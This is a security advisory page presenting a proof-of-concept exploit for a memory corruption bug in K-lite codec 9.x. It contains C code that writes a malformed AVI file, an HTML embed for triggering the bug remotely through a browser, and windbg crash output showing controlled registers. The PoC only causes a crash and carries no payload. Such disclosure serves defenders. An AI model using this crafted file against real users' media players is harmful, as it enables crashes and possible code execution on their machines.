K-lite codec Memory corruption vulnerability

2014.05.04
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: [K-lite codec Memory corruption vulnerability] # Date: [2014/05/3] # Author: [Aryan Bayaninejad] # Linkedin : https://www.linkedin.com/profile/view?id=276969082 # Vendor Homepage: [http://www.codecguide.com] # Software Link: [http://www.oldapps.com/k-lite_codec_pack.php?old_klite_codec=12328] # Version: [version 9.x and prior] # Tested on: [Windows Xp Sp3 32bit and 64 bit , Windows 7 32bit and 64 bit] # CVE : [CVE-2014-3151] # Found by Piece Dumb Fuzzer details: K-lite codec version 9.x and prior to that are vulnerable to a memory corruption vulnerability which allows remote attackers to execute arbitrary code execution to control the remote system via a malformed AVI file format . Tested on "Windows Media player latest edition", Internet explorer, GOM Player & KM player, Windows XP, 7 x64 & x86 . -------------------------------------------------------------------------------------------------------------------------------------------------- PoC to trigger memory corruption : #include<stdio.h> #include<stdlib.h> #include<windows.h> unsigned char sc[154] = { 0x52, 0x49, 0x46, 0x46, 0x44, 0x5E, 0x0A, 0x00, 0x41, 0x56, 0x49, 0x20, 0x4C, 0x49, 0x53, 0x54, 0x7C, 0xFC, 0x00, 0x00, 0x49, 0x4E, 0x46, 0x4F, 0x2D, 0x2D, 0x2D, 0x3E, 0xFC, 0xFF, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, } ; int main(int argc, char *argv[]) { HANDLE fileHandle = INVALID_HANDLE_VALUE; DWORD dwBytesWritten = 0; fileHandle = CreateFile("d:\\poc.AVI",GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); if(fileHandle == INVALID_HANDLE_VALUE) { printf("(-)Failed to Create File"); exit(0); }else{ printf("(+) Writing File ..."); WriteFile(fileHandle,sc,154,&dwBytesWritten,NULL); } CloseHandle(fileHandle); return 0; } -------------------------------------------------------------------------------------------------------------------------------------------------- PoC to Remote trigger memory corruption : <embed type="application/x-mplayer2" pluginspage="http://www.microsoft.com/Windows/MediaPlayer/" name="mediaplayer1" ShowStatusBar="true" EnableContextMenu="false" autostart="false" height="330" width="360" loop="false" src="D:/PoC.avi" /> windbg result: Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86 Copyright (c) Microsoft Corporation. All rights reserved. *** wait with pending attach Symbol search path is: c:\netw0rm\symbols Executable search path is: ModLoad: 01000000 01013000 C:\Program Files\Windows Media Player\wmplayer.exe ModLoad: 7c900000 7c9b2000 C:\WINDOWS\system32\ntdll.dll ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL ModLoad: 629c0000 629c9000 C:\WINDOWS\system32\LPK.DLL ModLoad: 74d90000 74dfb000 C:\WINDOWS\system32\USP10.dll ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll ModLoad: 12950000 133b5000 C:\WINDOWS\system32\wmp.dll ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5705_x-ww_36cfed49\COMCTL32.dll ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll ModLoad: 75a70000 75a91000 C:\WINDOWS\system32\MSVFW32.dll ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll ModLoad: 59a60000 59b01000 C:\WINDOWS\system32\dbghelp.dll ModLoad: 13740000 13f1b000 C:\WINDOWS\system32\wmploc.dll ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll ModLoad: 00ba0000 00e65000 C:\WINDOWS\system32\xpsp2res.dll ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime ModLoad: 4ec50000 4edf6000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.5660_x-ww_e0385ec6\gdiplus.dll ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll ModLoad: 63380000 63434000 C:\WINDOWS\system32\jscript.dll ModLoad: 7e720000 7e7d0000 C:\WINDOWS\system32\SXS.DLL ModLoad: 0d780000 0d7be000 C:\Program Files\Windows Media Player\mpvis.dll ModLoad: 63000000 630e6000 C:\WINDOWS\system32\WININET.dll ModLoad: 01400000 01409000 C:\WINDOWS\system32\Normaliz.dll ModLoad: 1a400000 1a532000 C:\WINDOWS\system32\urlmon.dll ModLoad: 5dca0000 5de88000 C:\WINDOWS\system32\iertutil.dll ModLoad: 15110000 1536c000 C:\WINDOWS\system32\wmvcore.dll ModLoad: 11c70000 11caa000 C:\WINDOWS\system32\WMASF.DLL ModLoad: 76380000 76385000 C:\WINDOWS\system32\MSIMG32.dll ModLoad: 77920000 77a13000 C:\WINDOWS\system32\SETUPAPI.dll ModLoad: 77690000 776b1000 C:\WINDOWS\system32\NTMARTA.DLL ModLoad: 71bf0000 71c03000 C:\WINDOWS\system32\SAMLIB.dll ModLoad: 76f60000 76f8c000 C:\WINDOWS\system32\WLDAP32.dll ModLoad: 0bef0000 0bf27000 C:\WINDOWS\system32\MFPlat.DLL ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll ModLoad: 61da0000 61db0000 C:\WINDOWS\system32\mcicda.dll ModLoad: 0e510000 0e562000 C:\WINDOWS\system32\mswmdm.dll ModLoad: 769c0000 76a74000 C:\WINDOWS\system32\USERENV.dll ModLoad: 5b860000 5b8b6000 C:\WINDOWS\system32\netapi32.dll ModLoad: 0dfb0000 0dfe9000 C:\WINDOWS\system32\mspmsp.dll ModLoad: 07940000 0797b000 C:\WINDOWS\system32\cewmdm.dll ModLoad: 11d10000 11d1d000 C:\WINDOWS\system32\wmdmps.dll ModLoad: 62bf0000 62c22000 C:\WINDOWS\system32\upnphost.dll ModLoad: 4d4f0000 4d549000 C:\WINDOWS\system32\WINHTTP.dll ModLoad: 74f00000 74f0c000 C:\WINDOWS\system32\SSDPAPI.dll ModLoad: 76d60000 76d79000 C:\WINDOWS\system32\iphlpapi.dll ModLoad: 13fe0000 14014000 C:\Program Files\Windows Media Player\wmpnssci.dll ModLoad: 109c0000 109ec000 C:\WINDOWS\system32\PortableDeviceTypes.dll ModLoad: 10930000 10979000 C:\WINDOWS\system32\PortableDeviceApi.dll ModLoad: 0e020000 0e089000 C:\WINDOWS\system32\MSSCP.dll ModLoad: 75cf0000 75d81000 C:\WINDOWS\system32\mlang.dll ModLoad: 08b70000 08c65000 C:\WINDOWS\system32\drmv2clt.dll ModLoad: 76ee0000 76f1c000 C:\WINDOWS\system32\RASAPI32.dll ModLoad: 76e90000 76ea2000 C:\WINDOWS\system32\rasman.dll ModLoad: 76eb0000 76edf000 C:\WINDOWS\system32\TAPI32.dll ModLoad: 76e80000 76e8e000 C:\WINDOWS\system32\rtutils.dll ModLoad: 77c70000 77c94000 C:\WINDOWS\system32\msv1_0.dll ModLoad: 722b0000 722b5000 C:\WINDOWS\system32\sensapi.dll ModLoad: 14030000 14054000 C:\WINDOWS\system32\wmpps.dll ModLoad: 71a50000 71a8f000 C:\WINDOWS\system32\mswsock.dll ModLoad: 662b0000 66308000 C:\WINDOWS\system32\hnetcfg.dll ModLoad: 71a90000 71a98000 C:\WINDOWS\System32\wshtcpip.dll ModLoad: 76fc0000 76fc6000 C:\WINDOWS\system32\rasadhlp.dll ModLoad: 76f20000 76f47000 C:\WINDOWS\system32\DNSAPI.dll ModLoad: 10000000 10008000 C:\Program Files\Internet Download Manager\idmmkb.dll ModLoad: 77b40000 77b62000 C:\WINDOWS\system32\appHelp.dll ModLoad: 5cb00000 5cb6e000 C:\WINDOWS\system32\shimgvw.dll ModLoad: 38a70000 38a7c000 C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL ModLoad: 78130000 781cb000 C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_44262b86\MSVCR80.dll ModLoad: 74810000 7497d000 C:\WINDOWS\system32\quartz.dll ModLoad: 75f40000 75f51000 C:\WINDOWS\system32\devenum.dll ModLoad: 02f30000 02f9e000 C:\Program Files\K-Lite Codec Pack\Filters\LAV\LAVSplitter.ax ModLoad: 6f640000 6f753000 C:\Program Files\K-Lite Codec Pack\Filters\LAV\avformat-lav-55.dll ModLoad: 69f00000 6aac0000 C:\Program Files\K-Lite Codec Pack\Filters\LAV\avcodec-lav-55.dll ModLoad: 6f540000 6f581000 C:\Program Files\K-Lite Codec Pack\Filters\LAV\avutil-lav-52.dll ModLoad: 02c00000 02c32000 C:\Program Files\K-Lite Codec Pack\Filters\LAV\libbluray.dll ModLoad: 02fe0000 03176000 C:\Program Files\K-Lite Codec Pack\Filters\vsfilter.dll ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.dll ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV ModLoad: 133d0000 1340f000 C:\WINDOWS\system32\wmpasf.dll ModLoad: 71b20000 71b32000 C:\WINDOWS\system32\MPR.dll ModLoad: 57fd0000 57ff7000 C:\WINDOWS\system32\mpg2splt.ax ModLoad: 031d0000 03206000 C:\Program Files\Common Files\Roxio Shared\9.0\MPEG\RoxioMPEGDemuxer.dll ModLoad: 03210000 0329b000 C:\Program Files\K-Lite Codec Pack\Filters\Haali\splitter.ax ModLoad: 02fc0000 02fd7000 C:\Program Files\K-Lite Codec Pack\Filters\Haali\mkzlib.dll ModLoad: 032b0000 032bc000 C:\Program Files\K-Lite Codec Pack\Filters\Haali\mkunicode.dll ModLoad: 03330000 03350000 C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll - (a20.f58): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll - eax=41414141 ebx=03360000 ecx=41414141 edx=03362248 esi=03362240 edi=00000044 eip=7c910ede esp=01d2f92c ebp=01d2fb4c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 ntdll!wcsncpy+0x905: 7c910ede 8b39 mov edi,dword ptr [ecx] ds:0023:41414141=????????


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top